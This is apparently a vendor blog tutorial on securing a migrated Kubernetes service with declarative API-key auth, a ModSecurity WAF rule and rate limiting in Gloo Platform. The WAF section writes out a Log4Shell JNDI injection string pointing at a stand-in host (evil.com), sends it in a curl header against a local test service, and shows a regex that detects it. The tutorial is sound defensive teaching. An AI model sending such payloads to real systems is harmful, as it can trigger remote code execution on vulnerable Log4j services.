Cloud migration meets its mesh, Part 2: Exploring declarative security

At Solo.io, we enjoy working with enterprises at various stages of their cloud journey. As a tech startup, in the early days we often collaborated with early adopters in the space – organizations who were moving rapidly up the cloud native experience curve. In many cases, their entire organization was “cloud native,” in that their entire infrastructure suite was born in the cloud.

Now as foundational technologies like containers and Kubernetes orchestration have crossed the chasm, Solo works more frequently with enterprises who are not so far along in their cloud journey. These are often large enterprises who have enjoyed business success for many years, and their IT infrastructures reflect that legacy.

In discussing the current and future capabilities of service mesh technology, we often hear questions like this:

“How can a service mesh like Istio help me along my cloud migration journey?”

In Part 1 of this series, we explored how a service mesh can assist with the earlier stages of the migration process, sometimes involving the lift-and-shift of existing VM-based deployments. We used a simple example to demonstrate how to use Gloo Platform to facilitate cloud migration from an externally deployed service to one managed within a Kubernetes cluster and an Istio-based service mesh.

But Lift-and-Shift is typically just the first step on a cloud migration journey. Most applications have opportunities to Move-and-Improve. A common area where enterprises want to improve their services as part of cloud migration is externalizing authorization code from the underlying applications into declarative policies. Gloo Platform offers a Swiss-army knife of external authNZ features to enable this transition.

In this Part 2 of the series, we will build from our previous example and add three separate security measures at the gateway.

  • API Key Security;
  • Web Application Firewall (WAF); and
  • Rate Limiting.

We’ll do this in a declarative fashion, without modifying even one line of code or configuration in the underlying application service.

Exercise prerequisites

We encourage you to work through the steps in Part 1 of this series in order to install Gloo Platform, to establish a Workspace and Virtual Gateway, to build and test routes to the un-migrated external service, to create the migrated service inside a Kubernetes cluster, and finally to manage the migration from the old to the new service. Once you’ve completed that exercise, then you should be ready to begin this one.

However, if you’d like to explore just the external security mechanisms in this installment of the series, we’ve provided a simple script in the “Starting from scratch” section below to establish a single local k3d cluster, install Gloo Platform, and establish the configuration necessary to begin this exercise.

First, let’s confirm a few other requirements if you’d like to follow along in your own environment. You’ll need a Kubernetes cluster and associated tools, plus an installation of Gloo Platform. We ran the tests in this blog on Gloo Platform v2.3.4 with Istio v1.17.2, hosted on a local instance of k3d v5.4.3.

You’ll need a license key to install Gloo Mesh Enterprise if you don’t already have one. You can obtain a key by initiating a free trial here.

For this exercise, we’ll also use some common CLI utilities like kubectl, curl, and git. Make sure these prerequisites are all available to you before jumping into the next section. We tested all of this on macOS, but other platforms should work as well.
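
If you want to double-check that these tools are in place, a quick sanity pass like the following works on most platforms (the k3d check applies only if you’re hosting locally with k3d):

kubectl version --client
curl --version
git --version
k3d version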

Starting from scratch

NOTE that you can skip this section if you already have an environment where you’ve completed Part 1 of this exercise.

If you haven’t already, you’ll need local access to the resources required for this exercise. They are available in the gloo-gateway-use-cases repo on GitHub. Clone that repo to your workstation and switch to its top-level gloo-gateway-use-cases directory. We’ll primarily be using the resources in the cloud-migration-pt2-security example.

git clone https://github.com/solo-io/gloo-gateway-use-cases.git
cd gloo-gateway-use-cases

As this is a getting-started example with Gloo Platform, you’ll only need a single k8s cluster active. However, if you already have multiple clusters in place, you can certainly use that configuration as well.
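
To see which clusters and contexts are currently available to you, the standard kubectl context listing is handy:

kubectl config get-contexts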

If you don’t have Gloo Platform installed, there is a simplified installation script available in the GitHub repo you cloned in the previous section. Before you execute that script, you’ll need three pieces of information, all supplied as environment variables (example export commands follow the list below).

  1. Place a Gloo license key in the environment variable GLOO_GATEWAY_LICENSE_KEY. If you don’t already have one of these, you can obtain it from your Solo account executive.
  2. Supply a reference to the repo where the hardened Solo images for Istio live. This value belongs in the environment variable ISTIO_REPO. You can obtain the proper value from this location once you’re a Gloo Mesh customer or have activated a free trial.
  3. Supply a version string for Gloo Mesh Gateway in the environment variable GLOO_MESH_VERSION. For the tests we are running here, we use v2.3.4.
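
For example, you might export the three values like this before running the script (the first two values shown are placeholders; substitute your own license key and image repo reference):

export GLOO_GATEWAY_LICENSE_KEY="<your-gloo-license-key>"
export ISTIO_REPO="<solo-istio-image-repo>"
export GLOO_MESH_VERSION="v2.3.4"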

Now from the gloo-gateway-use-cases directory at the top level of the cloned repo, execute the setup script below. It will configure a local k3d cluster containing Gloo Platform, an underlying Istio deployment, and the configuration necessary to begin this exercise. The script will fail if any of the three environment variables above is not present.

./cloud-migration-pt2-security/setup-prereq.sh

The output from the setup script should resemble what you see below. If you require a more complex installation, a more complete Gloo Platform installation guide is available here.

*******************************************
Updating Gloo Platform Helm charts...
*******************************************
"gloo-platform" already exists with the same configuration, skipping
Hang tight while we grab the latest from your chart repositories...
...Successfully got an update from the "gloo-platform" chart repository
Update Complete. ⎈Happy Helming!⎈
*******************************************
Establishing local k3d cluster...
*******************************************
INFO[0000] Using config file setup/k3d/gloo.yaml (k3d.io/v1alpha4#simple)
INFO[0000] portmapping '8080:80' targets the loadbalancer: defaulting to [servers:*:proxy agents:*:proxy]
INFO[0000] portmapping '8443:443' targets the loadbalancer: defaulting to [servers:*:proxy agents:*:proxy]
INFO[0000] Prep: Network
INFO[0000] Created network 'k3d-gloo'
INFO[0000] Created image volume k3d-gloo-images
INFO[0000] Starting new tools node...
INFO[0000] Starting Node 'k3d-gloo-tools'
INFO[0001] Creating node 'k3d-gloo-server-0'
INFO[0001] Creating LoadBalancer 'k3d-gloo-serverlb'
INFO[0001] Using the k3d-tools node to gather environment information
INFO[0001] Starting new tools node...
INFO[0001] Starting Node 'k3d-gloo-tools'
INFO[0002] Starting cluster 'gloo'
INFO[0002] Starting servers...
INFO[0002] Starting Node 'k3d-gloo-server-0'
INFO[0007] All agents already running.
INFO[0007] Starting helpers...
INFO[0007] Starting Node 'k3d-gloo-serverlb'
INFO[0014] Injecting records for hostAliases (incl. host.k3d.internal) and for 3 network members into CoreDNS configmap...
INFO[0016] Cluster 'gloo' created successfully!
INFO[0016] You can now use it like this:
kubectl config use-context k3d-gloo
kubectl cluster-info
*******************************************
Waiting to complete k3d cluster config...
*******************************************
Context "k3d-gloo" renamed to "gloo".
*******************************************
Installing Gloo Gateway...
*******************************************
Attempting to download meshctl version v2.3.4
Downloading meshctl-darwin-amd64...
Download complete!, validating checksum...
Checksum valid.
meshctl was successfully installed 🎉

Add the Gloo Mesh CLI to your path with:
  export PATH=$HOME/.gloo-mesh/bin:$PATH

Now run:
  meshctl install     # install Gloo Mesh management plane
Please see visit the Gloo Mesh website for more info:  https://www.solo.io/products/gloo-mesh/
 INFO  💻 Installing Gloo Platform components in the management cluster
 SUCCESS  Finished downloading chart.
 SUCCESS  Finished installing chart 'gloo-platform-crds' as release gloo-mesh:gloo-platform-crds
 SUCCESS  Finished downloading chart.
 SUCCESS  Finished installing chart 'gloo-platform' as release gloo-mesh:gloo-platform
workspace.admin.gloo.solo.io "gloo" deleted
workspacesettings.admin.gloo.solo.io "default" deleted
*******************************************
Waiting to complete Gloo Gateway config...
*******************************************
<snip...>
*******************************************
Rolling out httpbin deployment...
*******************************************
namespace/httpbin created
serviceaccount/httpbin created
service/httpbin created
deployment.apps/httpbin created
Waiting for httpbin deployment to complete...
Waiting for deployment "httpbin" rollout to finish: 0 out of 1 new replicas have been updated...
Waiting for deployment "httpbin" rollout to finish: 0 of 1 updated replicas are available...
deployment "httpbin" successfully rolled out
*******************************************
Establishing Gloo Platform workspace
namespace/ops-team created
workspace.admin.gloo.solo.io/ops-team created
workspacesettings.admin.gloo.solo.io/ops-team created
*******************************************
Establishing Gloo Platform virtual gateway
virtualgateway.networking.gloo.solo.io/north-south-gw created
*******************************************
Establishing Gloo Platform route table
routetable.networking.gloo.solo.io/httpbin created

Verify your configuration

Whether you’ve worked through Part 1 of this exercise, or used the shortcut script in the previous section, you’ll definitely want to confirm that you’re ready for the meat of this exercise.

Let’s do that in two steps, using Gloo Platform’s meshctl CLI and then running a sample invocation against our application service.

Verification #1 with meshctl

The meshctl command provides a number of useful utilities when working with Gloo Platform. We will use it to confirm that our installation has no outstanding issues.

meshctl check --kubecontext gloo

You should see a lot of GREEN in the response:

🟢 License status

 INFO  gloo-mesh enterprise license expiration is 08 Mar 24 10:04 EST
 INFO  Valid GraphQL license module found

🟢 CRD version check


🟢 Gloo Platform deployment status

Namespace        | Name                           | Ready | Status
gloo-mesh        | gloo-mesh-redis                | 1/1   | Healthy
gloo-mesh        | gloo-mesh-agent                | 1/1   | Healthy
gloo-mesh        | gloo-telemetry-gateway         | 1/1   | Healthy
gloo-mesh        | gloo-mesh-mgmt-server          | 1/1   | Healthy
gloo-mesh        | gloo-mesh-ui                   | 1/1   | Healthy
gloo-mesh        | prometheus-server              | 1/1   | Healthy
gloo-mesh-addons | redis                          | 1/1   | Healthy
gloo-mesh-addons | ext-auth-service               | 1/1   | Healthy
gloo-mesh-addons | rate-limiter                   | 1/1   | Healthy
gloo-mesh        | gloo-telemetry-collector-agent | 1/1   | Healthy

🟢 Mgmt server connectivity to workload agents

Cluster | Registered | Connected Pod
gloo    | true       | gloo-mesh/gloo-mesh-mgmt-server-6c58598fcd-6x5n4

Verification #2 with curl

Now run this curl command to confirm that our httpbin service instance is available through the gateway.

curl -X GET http://localhost:8080/get -i

You should see a successful 200 OK response similar to this:

HTTP/1.1 200 OK
server: istio-envoy
date: Mon, 05 Jun 2023 16:37:11 GMT
content-type: application/json
content-length: 669
access-control-allow-origin: *
access-control-allow-credentials: true
x-envoy-upstream-service-time: 17

{
  "args": {},
  "headers": {
    "Accept": "*/*",
    "Host": "localhost:8080",
    "User-Agent": "curl/7.87.0",
    "X-B3-Parentspanid": "ec12336f690367fb",
    "X-B3-Sampled": "0",
    "X-B3-Spanid": "7009f02f7385ef68",
    "X-B3-Traceid": "ac73cc61c8997719ec12336f690367fb",
    "X-Envoy-Attempt-Count": "1",
    "X-Envoy-Internal": "true",
    "X-Forwarded-Client-Cert": "By=spiffe://gloo/ns/httpbin/sa/httpbin;Hash=4fba21eb38f611c4194c68f0804b9cc737363d35f243f98f6c3b280e9286784c;Subject=\"\";URI=spiffe://gloo/ns/gloo-mesh-gateways/sa/istio-ingressgateway-1-17-2-service-account"
  },
  "origin": "10.42.0.1",
  "url": "http://localhost:8080/get"
}

Three declarative security examples

Note that while the verification command succeeded, we have no security at all around the endpoint we’re exposing through our gateway. As we Move-and-Improve this service in our Kubernetes environment, we’d like to secure it without changing the underlying application. Gloo Platform allows us to do that in a declarative fashion: we supply Kubernetes Custom Resources that Gloo translates into Envoy configuration applied at the ingress point of our application network. No application changes required!

Declarative security #1: API keys

API keys are a common mechanism for securing the ingress point of an application service. While the Gloo portfolio supports many security mechanisms, API keys are a popular choice because they are both simple and effective.

We’ll accomplish this in our example using four simple steps:

  • Establish some keys.
  • Establish a reference to the Gloo external auth service.
  • Establish an API key policy.
  • Attach that policy to one or more routes.

Establish an API key secret

We begin by creating an API key using just the string admin and storing it in a Kubernetes Secret. Note in particular the label attached to this Secret, with key api-keyset and value httpbin-users. We will later create a policy that selects all keys carrying this label.

apiVersion: v1
kind: Secret
metadata:
  name: solo-admin
  namespace: ops-team
  labels:
    api-keyset: httpbin-users
type: extauth.solo.io/apikey
data:
  api-key: YWRtaW4=  # this is "admin" in base64
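
If you’d like to generate the base64-encoded value yourself, any standard base64 utility will do. For example:

echo -n admin | base64    # prints YWRtaW4=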

Ensuring that you’re still in the gloo-gateway-use-cases directory, issue the following command to apply the Secret:

kubectl apply -f cloud-migration-pt2-security/01-apikey-secrets.yaml --context gloo

You should see a response like this:

secret/solo-admin created

Establish a link to the Gloo external auth service

Gloo Platform provides a variety of authentication options to meet the needs of your environment, ranging from basic use cases to complex, fine-grained access control. Architecturally, Gloo Gateway uses a dedicated auth server to verify user credentials and determine their permissions. Gloo Platform ships with an auth server that supports several authNZ implementations and also allows you to supply your own auth server to implement custom logic.

While some authentication solutions, such as JWT verification, can occur directly in Envoy, many use cases are better served by an external service. Envoy supports an external auth filter, where it reaches out to another service to authenticate and authorize a request, as a general solution for handling a large number of auth use cases at scale. Gloo Edge Enterprise comes with an external auth (ExtAuth) server that has built-in support for all standard authentication and authorization use cases, and a plugin framework for customization.

The graphic below provides context on how and when external authentication is evaluated, relative to other security features, as a request is received by Gloo Gateway and processed by Envoy.

Gloo Edge Envoy processing stack

For this exercise, all we need to do is establish an ExtAuthServer reference to the ext-auth-service instance that is already deployed in our environment. We will only need to establish this once in order to support all ExtAuth security mechanisms.

apiVersion: admin.gloo.solo.io/v2
kind: ExtAuthServer
metadata:
  name: default-server
  namespace: ops-team
spec:
  destinationServer:
    port:
      number: 8083
    ref:
      cluster: gloo
      name: ext-auth-service
      namespace: gloo-mesh-addons

Build the ExtAuthServer reference using this command:

kubectl apply -f cloud-migration-pt2-security/02-extauth-server.yaml --context gloo

Expect this response:

extauthserver.admin.gloo.solo.io/default-server created

Establish an API key policy

Note that the ExtAuthPolicy provided below brings together a number of important factors for establishing this API key mechanism:

  1. The server stanza points to the ExtAuthServer instance established in the previous step.
  2. The apiKeyAuth stanza selects all Secrets with the api-keyset attribute and a value of httpbin-users. This selects the admin secret we established earlier.
  3. The applyToRoutes stanza applies this policy to all routes with the label route: httpbin. We will modify our route to include this label in the next step.

apiVersion: security.policy.gloo.solo.io/v2
kind: ExtAuthPolicy
metadata:
  name: httpbin-apikey
  namespace: ops-team
spec:
  applyToRoutes:
  - route:
      labels:
        route: httpbin
  config:
    server:
      name: default-server
      namespace: ops-team
      cluster: gloo
    glooAuth:
      configs:
      - apiKeyAuth:
          headerName: x-api-key
          labelSelector:
            api-keyset: httpbin-users

Establish the ExtAuthPolicy:

kubectl apply -f cloud-migration-pt2-security/03-extauth-policy.yaml --context gloo

Expect a response like this:

extauthpolicy.security.policy.gloo.solo.io/httpbin-apikey created

Attach that policy to our route

Given that we established our policy with a route selector for any route with the label route: httpbin, we need to make a simple modification to our RouteTable to add that label.

apiVersion: networking.gloo.solo.io/v2
kind: RouteTable
metadata:
  name: httpbin
  namespace: ops-team
spec:
  hosts:
    - '*'
  virtualGateways:
    - name: north-south-gw
      namespace: ops-team
      cluster: gloo
  workloadSelectors: []
  http:
    - name: httpbin-in-mesh
      labels:
        route: httpbin  # Add this label to ensure it picks up our ExtAuthPolicy
      forwardTo:
        destinations:
          - ref:
              name: httpbin
              namespace: httpbin
              cluster: gloo
            port:
              number: 8000

Apply the RouteTable tweak with this command:

kubectl apply -f cloud-migration-pt2-security/04-rt-httpbin-label.yaml --context gloo

Expect this response:

routetable.networking.gloo.solo.io/httpbin configured

Confirm the policy is applied to the route

Would you like to confirm that the API key policy has been successfully applied to the route? You can do that by simply checking the status of the RouteTable, or by inspecting the Gloo Platform UI. Let’s investigate the UI option here, with a quick CLI check shown after the UI steps.

If you don’t have access to the UI already, you can use port-forwarding of the gloo-mesh-ui service to activate it at http://localhost:8090.

kubectl port-forward -n gloo-mesh svc/gloo-mesh-ui 8090:8090 --context gloo &

Then point your browser at http://localhost:8090 and navigate through Gateways to the httpbin Route. You can expect to see an interface like this, with the applied policy httpbin-apikey linked. Click through the link to see more details about the policy.
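
If you’d rather verify from the command line, you can dump the RouteTable and look for the attached policy in its status stanza. The exact status fields vary by Gloo Platform version, but a check along these lines should work:

kubectl get routetable httpbin -n ops-team -o yaml --context gloo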

Test API key security

Let’s test out our new policy with three use cases:

  • Test the original invocation with no API key header.
  • Test with an invalid API key header.
  • Test with a valid API key header.

First, now that the API key policy has been applied to our route, we expect the original invocation to fail since it provides no credentials. We are not disappointed:

curl -X GET http://localhost:8080/get -i

The response is a 401 Unauthorized:

HTTP/1.1 401 Unauthorized
www-authenticate: API key is missing or invalid
date: Fri, 02 Jun 2023 21:19:36 GMT
server: istio-envoy
content-length: 0

Second, if we add an invalid API key — say, developer instead of admin — we expect that to similarly fail. Again, our declarative policy is enforced just as expected.

curl -X GET -H "x-api-key: developer" http://localhost:8080/get -i

Here’s the expected failure result:

HTTP/1.1 401 Unauthorized
www-authenticate: API key is missing or invalid
date: Fri, 02 Jun 2023 21:20:25 GMT
server: istio-envoy
content-length: 0

Third and finally, if we supply an acceptable API key, then we get a valid response from the endpoint.

curl -X GET -H "x-api-key: admin" http://localhost:8080/get -i

Here’s the abridged response.

HTTP/1.1 200 OK
server: istio-envoy
date: Fri, 02 Jun 2023 21:19:25 GMT
content-type: application/json
content-length: 696
access-control-allow-origin: *
access-control-allow-credentials: true
x-envoy-upstream-service-time: 3

{
  "args": {},
  "headers": {
    "Accept": "*/*",
    "Host": "localhost:8080",
    "User-Agent": "curl/7.87.0",
    "X-Api-Key": "admin",
... snip ...

Declarative security #2: Web Application Firewall

Solo engineers have blogged and spoken extensively about the Log4Shell attack that set the Internet “on fire” in December 2021. Check out this blog for a more detailed description of this zero-day vulnerability that ravaged a number of high-profile enterprises who depend on the ubiquitous Log4J logging framework.

For zero-day vulnerabilities as pernicious as Log4Shell, having an arsenal of responses that can be deployed quickly, without changes to upstream applications, and across multiple services simultaneously, is a vital requirement.

One such weapon is a Web Application Firewall, or WAF. Gloo Platform’s WAF support builds on time-tested ModSecurity rules and makes them available at the gateway level. You can learn more about Solo’s WAF support both in product documentation and conference talks.

Test with a common Log4Shell attack vector

Log4Shell attacks operate by passing in a Log4J expression that causes a lookup to a remote server, like a JNDI identity service. The malicious expression might look something like this: ${jndi:ldap://evil.com/x}. It might be passed in to the service via a header, a request argument, or a request payload. What the attacker is counting on is that the vulnerable system will log that string using Log4j without checking it. That’s what triggers the destructive JNDI lookup and the ultimate execution of malicious code.

We’ll simulate one of these attack vectors by passing our evil.com string in a request header to our gateway, and then see that request routed to the target service.

We’ll use curl to simulate the attack, passing in the attack string as the value of the standard User-Agent header:

curl -X GET -H "x-api-key: admin" -H "User-Agent: \${jndi:ldap://evil.com/x}" http://localhost:8080/get -i

You can expect a response like the one below. Note in particular this entry in the headers response: "User-Agent": "${jndi:ldap://evil.com/x}". If httpbin were logging this header using Log4J, then we would have a real problem on our hands.

HTTP/1.1 200 OK
server: istio-envoy
date: Fri, 02 Jun 2023 21:25:34 GMT
content-type: application/json
content-length: 710
access-control-allow-origin: *
access-control-allow-credentials: true
x-envoy-upstream-service-time: 3

{
  "args": {},
  "headers": {
    "Accept": "*/*",
    "Host": "localhost:8080",
    "User-Agent": "${jndi:ldap://evil.com/x}",
... snip ...

Apply a WAF policy

Consider a simple ModSecurity rule that we’ll package into our gateway, which can block one of the more common Log4Shell attack vectors.

apiVersion: security.policy.gloo.solo.io/v2
kind: WAFPolicy
metadata:
  name: log4jshell
  namespace: ops-team
spec:
  applyToRoutes:
  - route:
      labels:
        route: httpbin
  config:
    disableCoreRuleSet: true
    customInterventionMessage: 'Log4Shell malicious payload'
    customRuleSets:
    - ruleStr: |-
        SecRuleEngine On
        SecRequestBodyAccess On
        SecRule ARGS|REQUEST_BODY|REQUEST_HEADERS
          "@rx \${jndi:(?:ldaps?|iiop|dns|rmi)://"
          "id:1000,phase:2,deny,status:403,log,msg:'Potential Remote Command Execution: Log4j CVE-2021-44228'"

Let’s examine what this policy does. The heart of it is the three-line SecRule directive in the custom rule set. The first line of that directive identifies the request variables we want to match: entities like ARGS, REQUEST_BODY, and REQUEST_HEADERS. These are the places whose contents might be logged by Log4J when the request is received, so we want to be sure to protect them. A full ModSec variable list is available here and a complete reference manual is here.

The second line is the condition applied to those variables. In this case, we’re matching any value that contains a ${jndi: lookup using the ldap, ldaps, iiop, dns, or rmi protocol.

Finally, the third line defines the action to take when the rule matches. In this case, we deny the request and return an HTTP 403 Forbidden error code.

We’ll apply this rule using the WAFPolicy API of Gloo Platform. Note from the policy YAML above that we have configured this rule to apply to any route carrying the label route: httpbin. Take a look at the httpbin RouteTable we established in a previous step, which already has this label in place.

This highlights one of the core strengths of Gloo Gateway: the ability to apply sophisticated policies once and have them automatically enforced across multiple backend services, with no changes to the target services. This is true not only of WAF policies, but of complex authNZ and transformation policies as well. Just add a label to the RouteTables of the services you need to protect from Log4Shell, and you have both instant and consistent protection across all those services. See our partner Snyk’s post about normalizing authorization policies that span a variety of backend services. OutSystems has also written about its use of Solo gateway technology to achieve similar results in a complex, multi-tenant environment.

Now let’s apply our new WAFPolicy and attach it to our httpbin route.

kubectl apply -f cloud-migration-pt2-security/05-waf-log4shell.yaml --context gloo

Expect to see this result:

wafpolicy.security.policy.gloo.solo.io/log4jshell created

Did WAF block the Log4Shell attack?

We’ll use curl again to simulate the same attack we made before against the unprotected service. Recall that the service fulfilled that request without complaint, which would have been a real problem had the backend service been vulnerable to Log4Shell.

curl -X GET -H "x-api-key: admin" -H "User-Agent: \${jndi:ldap://evil.com/x}" http://localhost:8080/get -i

But observe the difference with our WAF protection in place. The malicious request is now rejected with a 403 Forbidden error.

HTTP/1.1 403 Forbidden
content-length: 27
content-type: text/plain
date: Fri, 02 Jun 2023 21:27:10 GMT
server: istio-envoy

Log4Shell malicious payload

So that’s good news. But what happens if we provide a valid User-Agent header that doesn’t trigger our ModSec rule?

curl -X GET -H "x-api-key: admin" -H "User-Agent: curl/7.87.0" http://localhost:8080/get -i

The request is successful just as expected.

HTTP/1.1 200 OK
server: istio-envoy
date: Fri, 02 Jun 2023 21:27:26 GMT
content-type: application/json
content-length: 696
access-control-allow-origin: *
access-control-allow-credentials: true
x-envoy-upstream-service-time: 2

{
  "args": {},
  "headers": {
    "Accept": "*/*",
    "Host": "localhost:8080",
    "User-Agent": "curl/7.87.0",
... snip ...

So by using a simple declarative rule deployed within our gateway — and without the delay of modifying applications or the overhead of an extra hop to an outside WAF service — we’re able to respond to a pervasive zero-day vulnerability.

Declarative security #3: Rate limiting

One common problem that leads to a rate limiting requirement is the Distributed Denial of Service attack, or DDoS. We need to protect our services from DDoS, but we don’t want to modify individual applications in order to achieve that. What if we could specify an external rate limiting policy in a declarative fashion, and apply it across multiple services at the ingress point of our application networks?

Let’s first examine the YAML for a simple set of rate limiting constraints with Gloo Platform. In this case, let’s assume that 3 requests per minute is the threshold at which we want to start throttling requests. To implement that, we define four separate components.

Define request characteristics with a RateLimitClientConfig

A RateLimitClientConfig defines the characteristics of the different request “buckets” where we want to apply a limit. We only require a simple configuration here. More complexity is required to support something like a Quality-of-Service use case, say allowing 10 requests per minute for premium Gold customers but only 2 requests for others. In that instance, our client config would define additional attributes to consider (a hypothetical sketch follows the example below). But in this case we just need to define a simple counter. You can find more sophisticated examples in the Gloo Platform documentation.

apiVersion: trafficcontrol.policy.gloo.solo.io/v2
kind: RateLimitClientConfig
metadata:
  name: rate-limit-client-config
  namespace: ops-team
spec:
  raw:
    rateLimits:
    - actions:
      - genericKey:
          descriptorValue: counter
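
For contrast, a Quality-of-Service style client config might add a header-based action so that different customer tiers fall into different buckets. The sketch below is hypothetical and not part of this exercise: the x-customer-tier header and customer-tier descriptor key are made-up names, and the matching RateLimitServerConfig would need corresponding descriptors.

apiVersion: trafficcontrol.policy.gloo.solo.io/v2
kind: RateLimitClientConfig
metadata:
  name: rate-limit-client-config-qos  # hypothetical example, not applied in this exercise
  namespace: ops-team
spec:
  raw:
    rateLimits:
    - actions:
      - requestHeaders:
          headerName: x-customer-tier  # hypothetical header carrying the customer tier
          descriptorKey: customer-tier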

Define rate-limit tracking characteristics with a RateLimitServerConfig

A RateLimitServerConfig defines the enforcement parameters of the rate-limiting constraint. In our case, there is a specific limit of 3 requests per minute, shared across all requests on the route, since they all increment the same generic_key counter. There is also a pointer to the rate-limiter server, part of the Gloo Platform deployment, which we’ll declare in the next step.

apiVersion: admin.gloo.solo.io/v2
kind: RateLimitServerConfig
metadata:
  name: rate-limit-server-config
  namespace: ops-team
spec:
  destinationServers:
  - ref:
      name: rate-limiter
      namespace: gloo-mesh-addons
    port:
      name: grpc
  raw:
    descriptors:
    - key: generic_key
      rateLimit:
        requestsPerUnit: 3
        unit: MINUTE
      value: counter

Declare the rate limit server location with RateLimitServerSettings

Gloo Platform establishes a separate rate limiting server deployed along with its gateway. We need to define a one-time setting to specify its location.

apiVersion: admin.gloo.solo.io/v2
kind: RateLimitServerSettings
metadata:
  annotations:
    cluster.solo.io/cluster: ""
  name: rate-limit-server-settings
  namespace: ops-team
spec:
  destinationServer:
    port:
      number: 8083
    ref:
      cluster: gloo
      name: rate-limiter
      namespace: gloo-mesh-addons

Bind these configs together with a RateLimitPolicy

A RateLimitPolicy object ties the components defined in the previous steps together into a single policy, and also declares the routes to which it will be applied. In this case, we’ll use the same label selector route: httpbin that we used for the API key and WAF examples. This will bind the policy to our httpbin route.

apiVersion: trafficcontrol.policy.gloo.solo.io/v2
kind: RateLimitPolicy
metadata:
  name: rate-limit-policy
  namespace: ops-team
spec:
  applyToRoutes:
  - route:
      labels:
        route: "httpbin"
  config:
    serverSettings:
      name: rate-limit-server-settings
      namespace: ops-team
    ratelimitClientConfig:
      name: rate-limit-client-config
      namespace: ops-team
    ratelimitServerConfig:
      name: rate-limit-server-config
      namespace: ops-team

Now apply the RateLimitPolicy from your command shell:

kubectl apply -f cloud-migration-pt2-security/06-rate-limit-policy.yaml --context gloo

Expect this result:

ratelimitclientconfig.trafficcontrol.policy.gloo.solo.io/rate-limit-client-config created
ratelimitserverconfig.admin.gloo.solo.io/rate-limit-server-config created
ratelimitserversettings.admin.gloo.solo.io/rate-limit-server-settings created
ratelimitpolicy.trafficcontrol.policy.gloo.solo.io/rate-limit-policy created

Test rate limiting

We’ll use a simple bash script to test our 3-requests-per-minute rate limiting policy. If we simulate a DDoS attack by issuing 6 requests in succession, then the first 3 should succeed, but the last 3 should fail.

Let’s try that now, showing only the HTTP response code from the curl commands.

for i in {1..6}; do curl -X GET -H "x-api-key: admin" -s -o /dev/null -w "%{http_code}\n" http://localhost:8080/get ; done

As long as all 6 requests fall within the same one-minute window, then you can expect a response like this:

200
200
200
429
429
429

The first 3 requests received successful HTTP 200 OK responses. But the final 3 were rejected by the Envoy gateway with a 429 Too Many Requests rate-limited code.

Congratulations! If you made it to this point in the exercise, then you’ve established API key security, a Web Application Firewall, and rate limiting protection on your application network using strictly declarative configuration, with zero application changes. Nice job!

Exercise cleanup

If you used the local k3d cluster we set up earlier to establish your Gloo Platform environment for this exercise, then there is an easy way to tear down that environment as well. Just run this command:

./setup/teardown.sh
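
Alternatively, since the setup script created a k3d cluster named gloo, you can remove the cluster directly with the k3d CLI:

k3d cluster delete gloo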

Going beyond the basics: Next steps to explore

Thank you for taking this introductory cloud migration security tour with us. There are dozens of different avenues you might want to explore from this point. Here are a few ideas:

  • This example deployed our new service in a simple, single-cluster environment. Explore the richness of multi-cluster routing with automated failover from the Gloo Platform documentation here.
  • Our scenario assumed a single application team. Real-world enterprises need a service mesh that supports the division of responsibilities across platform teams and multiple application teams. Gloo Platform’s multi-tenancy features make this much easier.
  • We’ve discussed securing basic REST endpoints with Gloo Platform in this exercise. But Solo technology makes it easier to support more complex APIs in a simple, declarative way as well. For example, GraphQL is an open-source API mechanism growing rapidly in popularity. Gloo Platform allows you to support even non-GraphQL services using GraphQL APIs, and without a separate server instance as required by many alternative architectures. Learn more about Solo’s revolutionary approach to GraphQL here.

Learn more

In this blog post, we demonstrated how to use Gloo Platform to facilitate adding declarative security as part of a cloud migration process using an Istio service mesh.

All resources used to build the example in this post are available on GitHub.

Do you want to explore further how Solo and Gloo Platform can help you migrate your workloads to the cloud with best practices for traffic management, zero trust networking, and observability?